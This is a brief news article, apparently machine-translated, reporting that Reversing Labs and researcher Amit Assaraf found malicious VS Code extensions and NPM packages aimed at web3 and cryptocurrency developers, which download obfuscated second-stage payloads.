- Reversing Labs and Assaraf discover campaign targeting software and web developers3
- Multiple packages concealed weaponized code that implements stage two malware
- Malicious intent was very difficult to detect.
Experts have claimed that software developers, especially those working on web3 and cryptocurrency projects, are being targeted by a new attack on the software supply chain.
Security researcher Amit Assaraf published a new blog post describing how he had observed dozens of malicious Visual Studio Code extensions on the VSCode marketplace designed to download well-hidden second-stage payloads from suspicious domains (some in Russia).
A similar report was recently published by cybersecurity researchers Reversing Labs, who said the campaign likely began in October 2024.
Very obfuscated files
“Throughout October 2024, the RL research team saw a new wave of malicious VSCode extensions containing download functions, all part of the same campaign,” the researchers said. “The community was first notified of this campaign in early October and the team has been steadfast in following it ever since.”
The packages are designed for tools like Zoom, Solidity (a programming language for smart contracts on Ethereum, among others), and more. Similar packages were also found in NPM.
While both Reversing Labs and Assaraf did not analyze the second stage payload, beepcomputer It says it’s a “heavily obfuscated Windows CMD file” that launches a hidden PowerShell command. It aims to decrypt AES-encrypted strings in additional CMD files, to remove more payloads, including malware that is only detected by 27 of 71 antivirus engines.
While it is difficult to determine the number of compromised endpoints, Assaraf says it is most likely in the thousands. He added that the attack was very difficult to detect, since the packages meet all the requirements:
“Looking closely, you can see that it has several excellent indicators that it is real, the large number of installs, the official Zoom Github repository, and the positive reviews. By entering the editor’s page we continue to receive positive reinforcement,” he said. “The domain name looks great, it has the official support email, it has all the official social networks, everything is verified.”
The only thing developers can do is be careful when downloading software packages. “Don’t trust, verify” is the common mantra, especially within the cryptocurrency community.
Through beepcomputer
